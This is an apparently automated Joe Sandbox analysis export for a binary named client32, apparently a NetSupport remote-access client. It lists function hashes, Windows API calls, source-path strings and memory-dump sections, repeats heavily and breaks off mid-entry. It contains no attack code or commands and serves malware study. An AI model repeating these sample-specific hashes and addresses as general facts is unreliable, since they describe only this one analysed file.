                                                                                        • Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                        • Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
                                                                                        • Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                        • Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2
                                                                                        APIs
                                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
                                                                                        • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
                                                                                        • DestroyCursor.USER32(00000000), ref: 1103F7A1
                                                                                        • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
                                                                                        • UpdateWindow.USER32 ref: 1103F7F2
                                                                                          • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
                                                                                        • m_hWnd, xrefs: 1103F7E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 3726914545-2830328467
                                                                                        • Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                        • Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
                                                                                        • Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                        • Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756
                                                                                        APIs
                                                                                        • GetMenuItemCount.USER32(?), ref: 1115F62F
                                                                                        • _memset.LIBCMT ref: 1115F64B
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 1115F65C
                                                                                          • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                          • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                        • CheckMenuItem.USER32 ref: 1115F698
                                                                                        • EnableMenuItem.USER32 ref: 1115F6AE
                                                                                        • SetMenuItemInfoA.USER32 ref: 1115F6C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
                                                                                        • String ID: 0
                                                                                        • API String ID: 176136580-4108050209
                                                                                        • Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                        • Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
                                                                                        • Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                        • Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772
                                                                                        APIs
                                                                                        • _memmove.LIBCMT ref: 1108132F
                                                                                        • _memset.LIBCMT ref: 11081318
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                                        • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                                        • API String ID: 75970324-4264523126
                                                                                        • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                        • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                                        • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                        • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 1112BB88
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,SubnetMask,?,00000003), ref: 1112BB9B
                                                                                        • _malloc.LIBCMT ref: 1112BBCC
                                                                                          • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                          • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                          • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                        • _free.LIBCMT ref: 1112BBC4
                                                                                          • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                          • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                        • _free.LIBCMT ref: 1112BBEF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                        • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                        • API String ID: 1157017740-1843585929
                                                                                        • Opcode ID: ec03d54695a40ab4225806ab43fea2322c379f521fece9a83d1c943de74d1a29
                                                                                        • Instruction ID: 025fa0f69e9a781e62cb4a2f2b475bec3de050e97fc9d900637a873596563486
                                                                                        • Opcode Fuzzy Hash: ec03d54695a40ab4225806ab43fea2322c379f521fece9a83d1c943de74d1a29
                                                                                        • Instruction Fuzzy Hash: 790184BA6403026BF2348B759D85F6BF7A8AB40B14F60482CF95A9B584DA72E441C768
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$Find$Sleep
                                                                                        • String ID: PCIVideoSlave32
                                                                                        • API String ID: 2137649973-2496367574
                                                                                        • Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                        • Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
                                                                                        • Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                        • Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
                                                                                        APIs
                                                                                        • LoadMenuA.USER32 ref: 1100340E
                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 1100343A
                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 1100345C
                                                                                        • DestroyMenu.USER32 ref: 1100346A
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                        • API String ID: 468487828-934300333
                                                                                        • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                        • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                                        • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                        • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                                        APIs
                                                                                        • LoadMenuA.USER32 ref: 1100331D
                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                                        • DestroyMenu.USER32 ref: 11003379
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                        • API String ID: 4241058051-934300333
                                                                                        • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                        • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                                        • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                        • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000), ref: 110EFBB3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: ddebb3266c5ba79a07f6b8d470fa1eddbd939e1a1b388148c9d70ce23a4d5093
                                                                                        • Instruction ID: 7053a98a95f1787013b19c965889698e9493aed849bd5a4167a5a7c1904df78c
                                                                                        • Opcode Fuzzy Hash: ddebb3266c5ba79a07f6b8d470fa1eddbd939e1a1b388148c9d70ce23a4d5093
                                                                                        • Instruction Fuzzy Hash: 2241F772E012199FD724CFA8C985BAEF7F8EF84319F10456EE556DB680DB70A900C791
                                                                                        APIs
                                                                                        • GetWindowTextA.USER32(?,?,00000050), ref: 11025766
                                                                                        • _strncat.LIBCMT ref: 1102577B
                                                                                        • SetWindowTextA.USER32(?,?), ref: 11025788
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • GetDlgItemTextA.USER32 ref: 11025814
                                                                                        • GetDlgItemTextA.USER32 ref: 11025828
                                                                                        • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
                                                                                        • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
                                                                                        • SetFocus.USER32 ref: 11025855
                                                                                          • Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3832070631-0
                                                                                        • Opcode ID: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                                        • Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
                                                                                        • Opcode Fuzzy Hash: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                                        • Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54
                                                                                        APIs
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
                                                                                        • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000), ref: 110EF7BD
                                                                                        • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 110EF7EC
                                                                                        • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 110EF825
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 110EF82C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                        • String ID:
                                                                                        • API String ID: 3489003387-0
                                                                                        • Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                        • Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
                                                                                        • Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                        • Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2
                                                                                        APIs
                                                                                        • GetMenuItemCount.USER32(?), ref: 1114382B
